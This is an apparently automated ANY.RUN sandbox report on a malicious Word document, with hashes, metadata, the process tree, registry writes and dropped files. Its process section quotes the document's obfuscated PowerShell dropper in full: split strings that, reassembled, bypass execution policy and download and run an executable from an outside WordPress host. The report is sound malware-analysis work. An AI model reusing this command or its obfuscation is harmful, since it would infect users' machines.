File name:

Guide_08.11.2018_670673454.doc

Full analysis: https://app.any.run/tasks/d5bc39b0-93ba-44a1-abe4-1463e076f246
Verdict: Malicious activity
Analysis date: February 10, 2019, 19:38:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Henri Mottiez, Number of Characters: 371168, Create Time/Date: Mon Nov 5 09:46:10 2018, Last Saved Time/Date: Mon Nov 5 09:46:10 2018, Security: 0, Keywords: fugit, a, maiores, Last Saved By: Henri Mottiez, Revision Number: 918993, Subject: Guide N670673454, Template: Normal, Title: Guide N670673454, Total Editing Time: 01:00, Number of Words: 26512, Number of Pages: 54, Comments: Sequi praesentium repellendus laudantium libero quo necessitatibus laborum minima.
MD5:

71EEED2411A661B01DE54D5040EE4480

SHA1:

04B30B110331DA01E65AC6D5EB207E9CAA9E5712

SHA256:

E139CD2EB02F7A93C57BC6DADDD187255617FE923379F364D33D25892B874943

SSDEEP:

3072:2SacDC2kS5qXmSQZV7YJ9qmSzGt2uArD0LUhzikvQl4OSVfgvG3505dfgEEN:dacDqSDpZdYJxSit214M84/gvGgqN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2804)

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 2804)

    • Application was dropped or rewritten from another process

      • usiju.exe (PID: 3772)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 2804)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2804)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2804)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (33.9)

EXIF

FlashPix

CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
Software: Microsoft Office Word
Author: Henri Mottiez
Characters: 371168
CreateDate: 2018:11:05 09:46:10
ModifyDate: 2018:11:05 09:46:10
Security: None
Keywords: fugit, a, maiores
LastModifiedBy: Henri Mottiez
RevisionNumber: 918993
Subject: Guide N670673454
Template: Normal
Title: Guide N670673454
TotalEditTime: 1.0 minutes
Words: 26512
Pages: 54
Comments: Sequi praesentium repellendus laudantium libero quo necessitatibus laborum minima.
Paragraphs: 250
Bytes: -2147483648
HiddenSlides: -2147483648
Lines: 559
Notes: -2147483648
Slides: -2147483648
Company: Carron
Manager: Denise Chaudet
Category: temporibus
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe usiju.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2804"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Guide_08.11.2018_670673454.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3772C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exe $svddmoi='th=';$ieoooi14='qi';$avnrsro='cess; $pa';$ytxspwyu='rt-Proce';$syyoeo4='-force;';$mqreci='nfo/wp';$cgju65='e Pro';$ymkcydmi='ect S';$sgfaqz='gb.exe';$aofgogme51='press';$heyo='ove';$eieyzdi='Po';$hynf='t/t';$eyo='hemes/D';$lnaayyp='($env:tem';$eufz='DownloadF';$blyozr='ystem';$okjnxfb='l.e';$hqpeorl3='ile(''htt';$zqyb='ol'') ';$mghjhj='lic';$esv='t.W';$iclqh='New-Obj';$mkmi='y Bypa';$rcm=';Rem';$vjkcteo41=' -Scop';$axxeey=' + ''\is';$wxdba='2.hariom';$uuex='eb';$xaoue='emp';$yoo='ss $path';$adslsuy='.Ne';$ava='h); Sta';$gviei63='xe'',$pat';$ezwfne='-conten';$auya='-Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$vwryiqjs='urse ';$jmxlgsy='Se';$youxai='ss';$awqziyi='p+''\tnail';$uyzt='web.i';$oigf='ps://word';$kycpat8='client).';$cmeerres='t-Executi';$owg=''');(';$nivui='-rec';$wlzo='ivi/po';$gcauay='on';$lhixui='env:t'; Invoke-Expression ($jmxlgsy+$cmeerres+$gcauay+$eieyzdi+$mghjhj+$mkmi+$youxai+$vjkcteo41+$cgju65+$avnrsro+$svddmoi+$lnaayyp+$awqziyi+$sgfaqz+$owg+$iclqh+$ymkcydmi+$blyozr+$adslsuy+$esv+$uuex+$kycpat8+$eufz+$hqpeorl3+$oigf+$aofgogme51+$wxdba+$uyzt+$mqreci+$ezwfne+$hynf+$eyo+$wlzo+$okjnxfb+$gviei63+$ava+$ytxspwyu+$yoo+$rcm+$heyo+$auya+$lhixui+$xaoue+$axxeey+$ieoooi14+$zqyb+$nivui+$vwryiqjs+$syyoeo4);C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\users\admin\appdata\local\temp\isqiol\usiju.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
Total events
1 313
Read events
917
Write events
391
Delete events
5

Modification events

(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:.+$
Value:
2E2B2400F40A0000010000000000000000000000
(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2804) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1313472542
(PID) Process:(2804) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472656
(PID) Process:(2804) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472657
(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
F40A0000A2985F3C78C1D40100000000
(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:"-$
Value:
222D2400F40A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:"-$
Value:
222D2400F40A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2804) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
13
Suspicious files
0
Text files
121
Unknown types
2

Dropped files

PID
Process
Filename
Type
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR932E.tmp.cvr
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ide_08.11.2018_670673454.docpgc
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\DotNetTypes.format.ps1xmlxml
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\Diagnostics.Format.ps1xmltext
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\Certificate.format.ps1xmlxml
MD5:
SHA256:
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_arrays.help.txttext
MD5:04BB4AA2CF5A5D3EAD1D9F6EEA89C034
SHA256:0C058DF25203E39D339F127C0AE8235EE3E2E77F33B57F894E8E5A4AE6243EC8
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Command_Syntax.help.txttext
MD5:847B0C3A6010660492ECC1D88A69210D
SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B
2804WINWORD.EXEC:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Arithmetic_Operators.help.txttext
MD5:04D0CDC53B434B3FE0022831C9D06A84
SHA256:D42C3639DC7E4816800B1221E74F682BC3E6C8F34D00CC4765B3ADEBC173BBBA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
wordpress2.hariomweb.info
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Guide_08.11.2018_670673454.doc